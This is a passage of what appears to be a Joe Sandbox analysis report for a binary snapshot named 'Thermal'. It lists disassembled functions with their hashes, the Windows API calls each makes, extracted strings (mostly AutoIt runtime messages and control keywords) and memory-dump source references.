                                                      • Instruction ID: 9b82c810e7fc40f0be7e967cdd7086f2afc6ff242a3fb65dc9fb90eb4f17824e
                                                      • Opcode Fuzzy Hash: 98b8144ed90426c64df1422e5ba51fb74d3deaff55e4d36acc1e0af06434ef00
                                                      • Instruction Fuzzy Hash: FCA191342143519FCB14EF64C951A6AB3A5BFAA314F108929F8569B3E2DB70EC09CB91
                                                      APIs
                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 001956E1
                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 001956EC
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 001956F7
                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00195702
                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 0019570D
                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 00195718
                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 00195723
                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 0019572E
                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00195739
                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 00195744
                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 0019574F
                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 0019575A
                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 00195765
                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00195770
                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 0019577B
                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00195786
                                                      • GetCursorInfo.USER32(?), ref: 00195796
                                                      • GetLastError.KERNEL32(00000001,00000000), ref: 001957C1
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Cursor$Load$ErrorInfoLast
                                                      • String ID:
                                                      • API String ID: 3215588206-0
                                                      • Opcode ID: 83f126d6186a614dcea8a51bba20a254a21858e5b1a21aaf0b25a2c5084952d9
                                                      • Instruction ID: fcaa09aef89748384576fa73f39b8084401d82fba9050c5452763000a8f15311
                                                      • Opcode Fuzzy Hash: 83f126d6186a614dcea8a51bba20a254a21858e5b1a21aaf0b25a2c5084952d9
                                                      • Instruction Fuzzy Hash: B5414170E04319AADF109FBA8C4996EFEB8EF51B50B10452FA509E7290DBB8A5018F51
                                                      APIs
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0017B17B
                                                      • __swprintf.LIBCMT ref: 0017B21C
                                                      • _wcscmp.LIBCMT ref: 0017B22F
                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0017B284
                                                      • _wcscmp.LIBCMT ref: 0017B2C0
                                                      • GetClassNameW.USER32(?,?,00000400), ref: 0017B2F7
                                                      • GetDlgCtrlID.USER32(?), ref: 0017B349
                                                      • GetWindowRect.USER32(?,?), ref: 0017B37F
                                                      • GetParent.USER32(?), ref: 0017B39D
                                                      • ScreenToClient.USER32(00000000), ref: 0017B3A4
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0017B41E
                                                      • _wcscmp.LIBCMT ref: 0017B432
                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0017B458
                                                      • _wcscmp.LIBCMT ref: 0017B46C
                                                        • Part of subcall function 0014385C: _iswctype.LIBCMT ref: 00143864
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                      • String ID: %s%u
                                                      • API String ID: 3744389584-679674701
                                                      • Opcode ID: 55c7f2931a668624a79ab4c7d8aafc6df3b4ce85baf0d435d3fae7715c62065c
                                                      • Instruction ID: a62b08d2c5f8c613ca469873d38a8f96ee4cff1fe5e4fb84abd4ee999530313a
                                                      • Opcode Fuzzy Hash: 55c7f2931a668624a79ab4c7d8aafc6df3b4ce85baf0d435d3fae7715c62065c
                                                      • Instruction Fuzzy Hash: 4BA1C071208206ABDB15DF64C8C4BAAB7F8FF58354F108619F99EC2191DB30EA95CB91
                                                      APIs
                                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 0017BAB1
                                                      • _wcscmp.LIBCMT ref: 0017BAC2
                                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 0017BAEA
                                                      • CharUpperBuffW.USER32(?,00000000), ref: 0017BB07
                                                      • _wcscmp.LIBCMT ref: 0017BB25
                                                      • _wcsstr.LIBCMT ref: 0017BB36
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0017BB6E
                                                      • _wcscmp.LIBCMT ref: 0017BB7E
                                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 0017BBA5
                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0017BBEE
                                                      • _wcscmp.LIBCMT ref: 0017BBFE
                                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 0017BC26
                                                      • GetWindowRect.USER32(00000004,?), ref: 0017BC8F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                      • String ID: @$ThumbnailClass
                                                      • API String ID: 1788623398-1539354611
                                                      • Opcode ID: 8004c8aeaa4d3e897912a561062395c07851515bdcb2cdb78667dde161973e73
                                                      • Instruction ID: fafa85de8033fdd175d23540e2359b226e45afb50b647ce4b2d718490ba1ffa8
                                                      • Opcode Fuzzy Hash: 8004c8aeaa4d3e897912a561062395c07851515bdcb2cdb78667dde161973e73
                                                      • Instruction Fuzzy Hash: 78819D710082099BDB15DF14C8C5FAA7BE8FF54314F14C56AFD898A0A6EB34EE45CBA1
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: __wcsnicmp
                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                      • API String ID: 1038674560-1810252412
                                                      • Opcode ID: f5d823bf1200000bec1e914382d7fc94f4c3291f242f75501aeb36c6a2de9dfa
                                                      • Instruction ID: 7faa284fe9dee0a90223ae706f98e372c740b359f468e1bb8af045190fc7cc6f
                                                      • Opcode Fuzzy Hash: f5d823bf1200000bec1e914382d7fc94f4c3291f242f75501aeb36c6a2de9dfa
                                                      • Instruction Fuzzy Hash: 2331E1B1A48205F6CB04EB60CD83FEE73B4AF30754FA04126F665B11E2EF56AE04C652
                                                      APIs
                                                      • LoadIconW.USER32(00000063), ref: 0017CBAA
                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0017CBBC
                                                      • SetWindowTextW.USER32(?,?), ref: 0017CBD3
                                                      • GetDlgItem.USER32(?,000003EA), ref: 0017CBE8
                                                      • SetWindowTextW.USER32(00000000,?), ref: 0017CBEE
                                                      • GetDlgItem.USER32(?,000003E9), ref: 0017CBFE
                                                      • SetWindowTextW.USER32(00000000,?), ref: 0017CC04
                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0017CC25
                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0017CC3F
                                                      • GetWindowRect.USER32(?,?), ref: 0017CC48
                                                      • SetWindowTextW.USER32(?,?), ref: 0017CCB3
                                                      • GetDesktopWindow.USER32 ref: 0017CCB9
                                                      • GetWindowRect.USER32(00000000), ref: 0017CCC0
                                                      • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0017CD0C
                                                      • GetClientRect.USER32(?,?), ref: 0017CD19
                                                      • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0017CD3E
                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0017CD69
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                      • String ID:
                                                      • API String ID: 3869813825-0
                                                      • Opcode ID: d2e94fa3b618c346ceef9aab871f3e8c9d026c1b1345159554de6bcf5d639d6b
                                                      • Instruction ID: a3c135d8af3074920e5a945ff1cfbb62b7922b075b7886e809e3398969dabf93
                                                      • Opcode Fuzzy Hash: d2e94fa3b618c346ceef9aab871f3e8c9d026c1b1345159554de6bcf5d639d6b
                                                      • Instruction Fuzzy Hash: 82515E70900709AFDB219FA8CE85B6FBBF5FF08705F00461CE58AA29A0D774A954CB50
                                                      APIs
                                                      • _memset.LIBCMT ref: 001AA87E
                                                      • DestroyWindow.USER32(00000000,?), ref: 001AA8F8
                                                        • Part of subcall function 00131821: _memmove.LIBCMT ref: 0013185B
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 001AA972
                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 001AA994
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001AA9A7
                                                      • DestroyWindow.USER32(00000000), ref: 001AA9C9
                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00120000,00000000), ref: 001AAA00
                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001AAA19
                                                      • GetDesktopWindow.USER32 ref: 001AAA32
                                                      • GetWindowRect.USER32(00000000), ref: 001AAA39
                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 001AAA51
                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 001AAA69
                                                        • Part of subcall function 001229AB: GetWindowLongW.USER32(?,000000EB), ref: 001229BC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                      • String ID: 0$tooltips_class32
                                                      • API String ID: 1297703922-3619404913
                                                      • Opcode ID: 7e85a764f88f9191467617697a91a33636379dc27e2bbc16ed91b13e833524fb
                                                      • Instruction ID: 40b22832c3f9a5cdca43e386ec4192029a4fbd43ce559f2a7b06caa400c911ac
                                                      • Opcode Fuzzy Hash: 7e85a764f88f9191467617697a91a33636379dc27e2bbc16ed91b13e833524fb
                                                      • Instruction Fuzzy Hash: 80719A75240240AFE722CF28CC48FAB7BE5FB8A304F44061DF986872A1D770E956CB52
                                                      APIs
                                                        • Part of subcall function 001229E2: GetWindowLongW.USER32(?,000000EB), ref: 001229F3
                                                      • DragQueryPoint.SHELL32(?,?), ref: 001ACCCF
                                                        • Part of subcall function 001AB1A9: ClientToScreen.USER32(?,?), ref: 001AB1D2
                                                        • Part of subcall function 001AB1A9: GetWindowRect.USER32(?,?), ref: 001AB248
                                                        • Part of subcall function 001AB1A9: PtInRect.USER32(?,?,001AC6BC), ref: 001AB258
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 001ACD38
                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 001ACD43
                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 001ACD66
                                                      • _wcscat.LIBCMT ref: 001ACD96
                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 001ACDAD
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 001ACDC6
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 001ACDDD
                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 001ACDFF
                                                      • DragFinish.SHELL32(?), ref: 001ACE06
                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 001ACEF9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                      • API String ID: 169749273-3440237614
                                                      • Opcode ID: 5385d0229b033a03b428245345ad7a128898575fddf9b8e191d853f76b828fed
                                                      • Instruction ID: 260263208efa06a64d48c824bc41995dd2f27c950a85531b70fbf1e896464667
                                                      • Opcode Fuzzy Hash: 5385d0229b033a03b428245345ad7a128898575fddf9b8e191d853f76b828fed
                                                      • Instruction Fuzzy Hash: DA618C71108301AFC711EFA0DC85D9FBBE8EF99750F000A2EF595932A1DB709A49CB92
                                                      APIs
                                                      • VariantInit.OLEAUT32(00000000), ref: 0018831A
                                                      • VariantCopy.OLEAUT32(00000000,?), ref: 00188323
                                                      • VariantClear.OLEAUT32(00000000), ref: 0018832F
                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0018841D
                                                      • __swprintf.LIBCMT ref: 0018844D
                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 00188479
                                                      • VariantInit.OLEAUT32(?), ref: 0018852A
                                                      • SysFreeString.OLEAUT32(?), ref: 001885BE
                                                      • VariantClear.OLEAUT32(?), ref: 00188618
                                                      • VariantClear.OLEAUT32(?), ref: 00188627
                                                      • VariantInit.OLEAUT32(00000000), ref: 00188665
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                      • API String ID: 3730832054-3931177956
                                                      • Opcode ID: 364d2de7d2b6b86ba2dc518df9aeacb8660934b586ec79b2698aa8fcb692dab4
                                                      • Instruction ID: 2a58afbb83036ca02c6d86dff3372b4d3c531ea0446f3edf0995bdae2af08f7f
                                                      • Opcode Fuzzy Hash: 364d2de7d2b6b86ba2dc518df9aeacb8660934b586ec79b2698aa8fcb692dab4
                                                      • Instruction Fuzzy Hash: 71D10131604615EBDB24BFA9C884B6EB7B4FF18B00F658555E805AB290DF30EE40DFA0
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 001A4A61
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001A4AAC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: BuffCharMessageSendUpper
                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                      • API String ID: 3974292440-4258414348
                                                      • Opcode ID: 697c42c305d003569a81baf64a7dd5033ae90d01cd1f15b14b1e62e6ee4c97fa
                                                      • Instruction ID: dd987ae9bc8ef64d5d2721099816884645db8f326bc1eea1d1f4c878a9e8450c
                                                      • Opcode Fuzzy Hash: 697c42c305d003569a81baf64a7dd5033ae90d01cd1f15b14b1e62e6ee4c97fa
                                                      • Instruction Fuzzy Hash: 9791B0342047119FCB05EF60C451A6EB7A1BFE9354F10885DF89A5B3A2CB71ED5ACB82
                                                      APIs
                                                      • GetLocalTime.KERNEL32(?), ref: 0018E31F
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 0018E32F
                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0018E33B
                                                      • __wsplitpath.LIBCMT ref: 0018E399
                                                      • _wcscat.LIBCMT ref: 0018E3B1
                                                      • _wcscat.LIBCMT ref: 0018E3C3
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0018E3D8
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0018E3EC
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0018E41E
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0018E43F
                                                      • _wcscpy.LIBCMT ref: 0018E44B
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0018E48A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                      • String ID: *.*
                                                      • API String ID: 3566783562-438819550
                                                      • Opcode ID: eb22aa2132a99f1f07d9d5f881ead84f34c2079b409acc1ca5bc42d0cb4ac8f4
                                                      • Instruction ID: 759fdf1cdf57d65040d77a6d69ad8a4fa6d285053542e2ee9002e4b4e3e692da
                                                      • Opcode Fuzzy Hash: eb22aa2132a99f1f07d9d5f881ead84f34c2079b409acc1ca5bc42d0cb4ac8f4
                                                      • Instruction Fuzzy Hash: 156157725046159FC710EF60D884A9EB3E9FF99310F04891EF989C7251EB35EA49CF92
                                                      APIs
                                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0018A2C2
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0018A2E3
                                                      • __swprintf.LIBCMT ref: 0018A33C
                                                      • __swprintf.LIBCMT ref: 0018A355
                                                      • _wprintf.LIBCMT ref: 0018A3FC
                                                      • _wprintf.LIBCMT ref: 0018A41A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: LoadString__swprintf_wprintf$_memmove
                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                      • API String ID: 311963372-3080491070
                                                      • Opcode ID: 73a3f056db6b288f67b833d30343a532c5b3a65a0af5079f4da401ce61fb36ef
                                                      • Instruction ID: d4fef7fcbbab72af28739ac8920f3795f233ff2fdfec6f9c9a8847cb42c1a600
                                                      • Opcode Fuzzy Hash: 73a3f056db6b288f67b833d30343a532c5b3a65a0af5079f4da401ce61fb36ef
                                                      • Instruction Fuzzy Hash: EF519D71900109BADF15EBE0CD86EEEB779AF28340F500166F505B21A2EB752F58DB61
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,0016F8B8,00000001,0000138C,00000001,00000000,00000001,?,00193FF9,00000000), ref: 0018009A
                                                      • LoadStringW.USER32(00000000,?,0016F8B8,00000001), ref: 001800A3
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                      • GetModuleHandleW.KERNEL32(00000000,001E7310,?,00000FFF,?,?,0016F8B8,00000001,0000138C,00000001,00000000,00000001,?,00193FF9,00000000,00000001), ref: 001800C5
                                                      • LoadStringW.USER32(00000000,?,0016F8B8,00000001), ref: 001800C8
                                                      • __swprintf.LIBCMT ref: 00180118
                                                      • __swprintf.LIBCMT ref: 00180129
                                                      • _wprintf.LIBCMT ref: 001801D2
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 001801E9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                      • API String ID: 984253442-2268648507
                                                      • Opcode ID: 6987ed7ae304fb3bd5763c1adfff3b78dbb420d22188f4526bbca7603179ab8f
                                                      • Instruction ID: 4c26d2d4c2541a1bb990633ca2ec230244caa82289cc53b63b37e4a044778e2f
                                                      • Opcode Fuzzy Hash: 6987ed7ae304fb3bd5763c1adfff3b78dbb420d22188f4526bbca7603179ab8f
                                                      • Instruction Fuzzy Hash: 9641057280021DBACF15FBE0CD96EEEB779AF28341F500165F505A2092EB756F49CBA1
                                                      APIs
                                                        • Part of subcall function 00124D37: __itow.LIBCMT ref: 00124D62
                                                        • Part of subcall function 00124D37: __swprintf.LIBCMT ref: 00124DAC
                                                      • CharLowerBuffW.USER32(?,?), ref: 0018AA0E
                                                      • GetDriveTypeW.KERNEL32 ref: 0018AA5B
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0018AAA3
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0018AADA
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0018AB08
                                                        • Part of subcall function 00131821: _memmove.LIBCMT ref: 0013185B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmpDownload File
